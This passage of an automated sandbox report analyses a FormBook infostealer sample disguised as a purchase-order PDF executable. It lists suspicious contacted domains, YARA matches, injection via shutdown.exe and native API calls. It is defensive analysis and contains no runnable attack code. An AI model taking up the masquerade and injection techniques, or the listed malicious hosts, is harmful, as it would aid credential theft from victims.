Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 09 Nov 2024 04:38:34 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669534fa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 09 Nov 2024 04:38:36 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669534fa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: shutdown.exe, 00000007.00000002.4473736841.0000000004452000.00000004.10000000.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4473238785.0000000003D42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://estrela-b.online/e3rr/?J8LHgDJp=IgJ9cBvr78oV/XAx6CGZHJrYQ
                Source: shutdown.exe, 00000007.00000002.4473736841.0000000004C2C000.00000004.10000000.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4473238785.000000000451C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://eyecatch.pro/42c3/?J8LHgDJp=JBDdfBWF/aARUf0PyG02RiIz2qli5PW
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000002.2018067179.00000000027C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: MKVNVRSuoK.exe, 00000009.00000002.4475014817.00000000052F8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jllllbx.top
                Source: MKVNVRSuoK.exe, 00000009.00000002.4475014817.00000000052F8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jllllbx.top/gv4o/
                Source: shutdown.exe, 00000007.00000002.4475619589.0000000005EB0000.00000004.00000800.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473736841.0000000003954000.00000004.10000000.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4473238785.0000000003244000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2504642896.000000000C4E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tubetrexhd.buzz/2t4j?gp=1&js=1&uuid=1731126929.9738454148&other_args=eyJ1cmkiOiAiLzJ0NGoi
                Source: firefox.exe, 0000000A.00000002.2504642896.000000000C4E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www70.tubetrexhd.buzz/
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000284F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000287F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000284F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000284F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033h
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000287F000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4472317980.000000000284F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000284F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: shutdown.exe, 00000007.00000003.2393663132.0000000007905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4473043589.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4472088582.00000000026C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4475014817.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2238337409.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4473189897.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4473138354.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2221565153.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                .NET source code contains very large array initializations
                Source: New PO [FK4-7173].pdf.exe, CompositeType.csLarge array initialization: : array initializer size 821658
                Source: 7.2.shutdown.exe.356cd14.2.raw.unpack, CompositeType.csLarge array initialization: : array initializer size 821658
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: New PO [FK4-7173].pdf.exe
                Uses shutdown.exe to shutdown or reboot the system
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0042C8C3 NtClose,4_2_0042C8C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172B60 NtClose,LdrInitializeThunk,4_2_01172B60
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01172DF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01172C70
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011735C0 NtCreateMutant,LdrInitializeThunk,4_2_011735C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01174340 NtSetContextThread,4_2_01174340
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01174650 NtSuspendThread,4_2_01174650
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172B80 NtQueryInformationFile,4_2_01172B80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172BA0 NtEnumerateValueKey,4_2_01172BA0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172BF0 NtAllocateVirtualMemory,4_2_01172BF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172BE0 NtQueryValueKey,4_2_01172BE0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172AB0 NtWaitForSingleObject,4_2_01172AB0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172AD0 NtReadFile,4_2_01172AD0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172AF0 NtWriteFile,4_2_01172AF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172D10 NtMapViewOfSection,4_2_01172D10
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172D00 NtSetInformationFile,4_2_01172D00
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172D30 NtUnmapViewOfSection,4_2_01172D30
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172DB0 NtEnumerateKey,4_2_01172DB0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172DD0 NtDelayExecution,4_2_01172DD0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172C00 NtQueryInformationProcess,4_2_01172C00
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172C60 NtCreateKey,4_2_01172C60
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172CA0 NtQueryInformationToken,4_2_01172CA0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172CC0 NtQueryVirtualMemory,4_2_01172CC0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172CF0 NtOpenProcess,4_2_01172CF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172F30 NtCreateSection,4_2_01172F30
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172F60 NtCreateProcessEx,4_2_01172F60
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172F90 NtProtectVirtualMemory,4_2_01172F90
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172FB0 NtResumeThread,4_2_01172FB0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172FA0 NtQuerySection,4_2_01172FA0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172FE0 NtCreateFile,4_2_01172FE0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172E30 NtWriteVirtualMemory,4_2_01172E30
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172E80 NtReadVirtualMemory,4_2_01172E80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172EA0 NtAdjustPrivilegesToken,4_2_01172EA0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172EE0 NtQueueApcThread,4_2_01172EE0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01173010 NtOpenDirectoryObject,4_2_01173010
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01173090 NtSetValueKey,4_2_01173090
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011739B0 NtGetContextThread,4_2_011739B0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01173D10 NtOpenProcessToken,4_2_01173D10
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01173D70 NtOpenThread,4_2_01173D70
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB4340 NtSetContextThread,LdrInitializeThunk,7_2_02FB4340
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB4650 NtSuspendThread,LdrInitializeThunk,7_2_02FB4650
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2AF0 NtWriteFile,LdrInitializeThunk,7_2_02FB2AF0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2AD0 NtReadFile,LdrInitializeThunk,7_2_02FB2AD0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02FB2BF0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02FB2BE0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02FB2BA0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2B60 NtClose,LdrInitializeThunk,7_2_02FB2B60
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02FB2EE0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02FB2E80
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2FE0 NtCreateFile,LdrInitializeThunk,7_2_02FB2FE0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2FB0 NtResumeThread,LdrInitializeThunk,7_2_02FB2FB0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2F30 NtCreateSection,LdrInitializeThunk,7_2_02FB2F30
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02FB2CA0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02FB2C70
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2C60 NtCreateKey,LdrInitializeThunk,7_2_02FB2C60
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02FB2DF0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2DD0 NtDelayExecution,LdrInitializeThunk,7_2_02FB2DD0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02FB2D30
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02FB2D10
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB35C0 NtCreateMutant,LdrInitializeThunk,7_2_02FB35C0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB39B0 NtGetContextThread,LdrInitializeThunk,7_2_02FB39B0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2AB0 NtWaitForSingleObject,7_2_02FB2AB0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2B80 NtQueryInformationFile,7_2_02FB2B80
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2EA0 NtAdjustPrivilegesToken,7_2_02FB2EA0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2E30 NtWriteVirtualMemory,7_2_02FB2E30
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2FA0 NtQuerySection,7_2_02FB2FA0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2F90 NtProtectVirtualMemory,7_2_02FB2F90
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2F60 NtCreateProcessEx,7_2_02FB2F60
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2CF0 NtOpenProcess,7_2_02FB2CF0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2CC0 NtQueryVirtualMemory,7_2_02FB2CC0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2C00 NtQueryInformationProcess,7_2_02FB2C00
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2DB0 NtEnumerateKey,7_2_02FB2DB0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2D00 NtSetInformationFile,7_2_02FB2D00
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB3090 NtSetValueKey,7_2_02FB3090
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB3010 NtOpenDirectoryObject,7_2_02FB3010
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB3D70 NtOpenThread,7_2_02FB3D70
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB3D10 NtOpenProcessToken,7_2_02FB3D10
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026E9350 NtReadFile,7_2_026E9350
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026E91E0 NtCreateFile,7_2_026E91E0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026E9650 NtAllocateVirtualMemory,7_2_026E9650
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026E9440 NtDeleteFile,7_2_026E9440
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026E94E0 NtClose,7_2_026E94E0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_04B402BC0_2_04B402BC
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_04B422180_2_04B42218
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_04B422090_2_04B42209
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_0513C0700_2_0513C070
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_051365700_2_05136570
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_051385800_2_05138580
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_051365800_2_05136580
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_051361480_2_05136148
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_051381480_2_05138148
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_051369B80_2_051369B8
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_070521060_2_07052106
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_0705A9880_2_0705A988
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_070558400_2_07055840
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_0705C0580_2_0705C058
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_070550D80_2_070550D8
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_0705E3100_2_0705E310
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_0705F9000_2_0705F900
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_0705A9790_2_0705A979
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_0705A9870_2_0705A987
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_0705C0570_2_0705C057
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_0705F8EF0_2_0705F8EF
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_004188C34_2_004188C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_004028C04_2_004028C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_004011594_2_00401159
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_004011604_2_00401160
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_004031604_2_00403160
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0041017A4_2_0041017A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_004101834_2_00410183
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_00416AFE4_2_00416AFE
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_004012A04_2_004012A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_00416B034_2_00416B03
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_004103A34_2_004103A3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_00402C704_2_00402C70
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0040E4234_2_0040E423
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0040E5674_2_0040E567
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_004025B04_2_004025B0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0042EEB34_2_0042EEB3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DA1184_2_011DA118
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011301004_2_01130100
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C81584_2_011C8158
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_012001AA4_2_012001AA
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F41A24_2_011F41A2
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F81CC4_2_011F81CC
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D20004_2_011D2000
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FA3524_2_011FA352
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_012003E64_2_012003E6
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114E3F04_2_0114E3F0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E02744_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C02C04_2_011C02C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011405354_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_012005914_2_01200591
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E44204_2_011E4420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F24464_2_011F2446
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EE4F64_2_011EE4F6
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011647504_2_01164750
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011407704_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113C7C04_2_0113C7C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115C6E04_2_0115C6E0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011569624_2_01156962
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0120A9A64_2_0120A9A6
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A04_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114A8404_2_0114A840
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011428404_2_01142840
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011268B84_2_011268B8
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E8F04_2_0116E8F0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FAB404_2_011FAB40
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F6BD74_2_011F6BD7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113EA804_2_0113EA80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DCD1F4_2_011DCD1F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114AD004_2_0114AD00
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01158DBF4_2_01158DBF
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113ADE04_2_0113ADE0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140C004_2_01140C00
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0CB54_2_011E0CB5
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01130CF24_2_01130CF2
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01160F304_2_01160F30
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E2F304_2_011E2F30
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01182F284_2_01182F28
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B4F404_2_011B4F40
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BEFA04_2_011BEFA0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01132FC84_2_01132FC8
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114CFE04_2_0114CFE0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FEE264_2_011FEE26
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140E594_2_01140E59
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01152E904_2_01152E90
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FCE934_2_011FCE93
